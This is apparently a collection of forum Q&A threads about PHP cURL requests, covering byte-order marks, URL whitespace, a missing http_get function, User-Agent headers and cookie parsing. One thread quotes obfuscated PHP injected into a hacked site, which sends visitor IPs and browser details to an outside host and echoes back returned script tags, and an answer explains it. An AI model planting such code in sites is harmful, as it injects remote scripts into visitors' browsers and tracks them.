Alright so I have cURL installed correctly, and am now trying to do a simple call to an URL, for some reason I'm not seeing anything happening in my database (The URL being called should make changes to my database, this is tested by calling the URL directly in my browser)
This is my code :
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.website.com/receive/001/ALKDLDKGJLKSD/ASIODULKJASFL");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
In my terminal I am getting the following response:
´╗┐
Am I just misunderstanding how cURL should be used for a simple web request?
Your code is correct. It retrieves the HTTP page (I've tested it on my terminal).
The three characters you are getting is probably a UTF-8 byte order mask.
0xEF,0xBB,0xBF
Either it is what the page returns. Or you have these at the beginning on your PHP script (some editors put these implicitly to the text files, the characters won't show in the editor itself).
Well I got it working, it looked like there was some security behind the URL I tried to access, silly me for not checking that correctly. Still many thanks for all the suggestions!
Related
I'm supposed to perform the curl operation and unfortunately the request is keep on sending without any response been returned. While investigating this i got know the url string is in trouble. Im supposed to open 'http://api.ikarthick.in' instead i could able to 'http: //api.ikarthick.in' which has a white space between : & // . Kindly check the below code.
<?php
$url = "http://api.ikarthick.in"; //as it is public in stackoverflow i've truncated the exact url
print($url);
return; //used this return only while investigating the issue which that i got see whats in $url
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($curl);
print($response);
?>
For this the output i see on my Postman as mentioned below,
http: //api.ikarthick.in
Also when click //api.ikarthick.in on the POSTMAN response screen, i got to see http://localhost//ikarthick.in being opened in the new tab of POSTMAN. I tried running the same on webbrowser and got the expected output.
But problem is, i can't make curl operation with the above url. Could anyone help me to fix this ?
Thanks in advance.
probably an invisible whitespace in the code which your IDE is not good at handling.
open the source code in a hex editor and remove the whitespace there. if you're on Windows, HxD Hex Editor is an excellent choice, as for Linux, Bless Hex Editor is decent.
When I call http_get it never returns, my WEB page just stops outputting at that point. The destination URL never gets the request.
<?php //simplest test of http_get I could make
print "http://kayaker.net/php/image.php?id=ORCS084144<br>";
http_get ("http://kayaker.net/php/image.php?id=ORCS084144");
print "<br>back from http_get<br>";
?>
The original script was calling http_get in a loop to send data to several other processes on another server.
The loop stops on the first call to http_get. I tried calling flush(); after every line printed, no joy. I tried setting longer timeouts in the $options parameter to http_get, that didn't help. I tried calling http_request with HTTP_METH_GET in the first argument, same problem.
This kayaker URL is not the original, just a shorter example that still fails. I took one of the original URLs and pasted it into my browser address line, it worked fine. I pasted some of the original URLs into another scripting language (The llHTTPRequest function in LSL on Open Simulator) and they work fine from there.
I stored the program above at a location where you can run it from your browser and see it fail.
I pasted the URL to the program above into another scripting language and that at least returned an error status (500) and a message "Internal Server Error" which probably just means the test program didn't terminate properly.
I must be doing something very simple stupid and basically wrong.
But what is it?
Problem
You do not seem to have the right package installed (PECL pecl_http >= 0.1.0).
Fatal error: Call to undefined function http_get() in [snip] on line 8
Solution
You can either
install pecl_http as described in the documentation.
use a different function as mentioned in the comments (file_get_contents, curl)
Thanks to the comments above and the surprisingly helpful people at my WEB hosting company, I was able to write the following function:
function http_get($url)
{
$ch = curl_init(); // initialize curl handle
curl_setopt($ch, CURLOPT_URL,$url); // set url to post to
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);// allow redirects
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); // return into a variable
curl_setopt($ch, CURLOPT_TIMEOUT, 3); // times out after 4s
$result = curl_exec($ch); // run the whole process
curl_close($ch);
return($result);
} //http_get
This works for many different URLs, but does fail on some servers, I hope by playing with the options I can get it working there.
Recently a website I have been involved with was hacked with unauthorised code being placed on a number of pages. I was just wondering if anyone could shed any light onto what exactly this code does, and what benefit it would be to the user who placed it on these pages.
<?php
#31e3cd#
error_reporting(0); ini_set('display_errors',0); $wp_okpbo35639 = #$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_okpbo35639) && !preg_match ('/bot/i', $wp_okpbo35639))){
$wp_okpbo0935639="http://"."html"."-href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_okpbo35639);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_okpbo0935639);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_35639okpbo = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_35639okpbo,1,3) === 'scr' ){ echo $wp_35639okpbo; }
#/31e3cd#
?>
Above is the code, as it appeared on the pages. I have played around with this code and it seems to get user information using:
$_SERVER['HTTP_USER_AGENT']
It is then combined into a url similar to the one below, but with the user information from above added to the url
http://html-href.com/href/?ip=::1&referer=localhost&ua=
I know curl is used in the transfer of data but where exactly is this information getting sent and what is its purpose?
The code makes a call to the URL you noted, sending along the user's IP, your site's domain, and the user's useragent string. It's then printing onto your site any code it receives from the cURL request. The code received could be anything. It could be HTML, JavaScript, or any other client side code. It's probably not server-side code since there's no eval() running the code received.
It appears to target Internet Explorer, Chrome, and FireFox browsers, but not crawlers/bots.
EDIT: As FDL pointed out in his comment, this appears to be printing only if it receives a string where the second, third, and fourth characters are scr, meaning it likely only prints to the page if it received a <script> tag.
$_SERVER['HTTP_USER_AGENT'] is used to check the kind of web browser (or can be a crawler) from which the client requests the resource based on the URL. For instance with this snippet preg_match ('/Gecko|MSIE/i', $wp_okpbo35639), it is used to check if the client browser is Firefox(Gecko) or IE(MSIE). But this is not a foolproof way to determine the source browser as user-agents can easily be changed or switched.
I'm attempting to use PHP's CURL to make a GET request to a server and am having some difficulties doing so. When I make the request through PHP I am returned a 500 error from the external server. However, if I make the request using the bash curl, or visit the URL in a browser it succeeds.
I've stripped the PHP down to the bare essentials:
$url = 'http://example.com:8080/path/to/service?cmd=my_command&arg=example2.com';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_exec($ch);
print_r(curl_getinfo($ch));
curl_close($ch);
As stated this returns a 500 error from example.com. However, if I do the following:
[me#host ~] curl "http://example.com:8080/path/to/service?cmd=my_command&arg=example2.com"
I am returned the expected XML document.
What gives? It's got to be something with the encoding of the URL, as if I strip the $url var down to just http://example.com:8080 the PHP CURL request now responds with 200. I've tried replacing the & with %26 - that didn't work (nor would I expect it to, as & is valid in the URL there). I've tried doing what the answer for php curl sending vars using GET wierd results suggested, but that didn't help either.
What am I missing here? I'm sure that it's something absurdly simple, but it's escaping me.
Thanks!
EDIT: I've just attempted doing this in Python - just to see what happened - and it works fine there:
import urllib2
r = urllib2.urlopen(theURL)
r.read()
It turns out that the API I was accessing required a User-Agent for all requests, but did not provide any information to indicate such.
Is this a common thing? I can't find any other examples of anyone else doing this other than http://developer.github.com/v3/#user-agent-required
I was able to get things working just fine by adding
curl_setopt($ch, CURLOPT_USERAGENT, "User-Agent: Some-Agent/1.0");
I am searching 3 days for an answer and I cannot find one because I always find some obstacles.
I need to load a web page (the reason for this is to accept a cookie) and then at the same time read the source code of the new page without hitting it again. The reason for this is that the page is dynamic so the content will change.
I have tried to do this using iFrame(document.body.innerHTML) but the fact that these pages run on different servers I hit cross-site scripting issues.
I have also tried writing a php script using get_contents but this doesn't allow the cookie to be stored in my local.
This is driving me crazy.... Any suggestion will be helful! Need to use PHP or Javascript for this and any other suggestion will be useful as well.
When you are on the page document.body.innerHTML will give you the page source.
Edit: I didn't realize you were loading it like that. See this SO question.
It can be done using cURL in PHP.
A rough implementation:
$ch = curl_init('http://www.google.com/');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
$data = curl_exec($ch);
preg_match('/^Set-Cookie: (.*?);/m', $data, $cookies);
var_dump($cookies);
var_dump($data);
$data will contain the entire response, so we need to parse out the cookie headers ourselves.
If available on your system, HttpRequest would make this easier.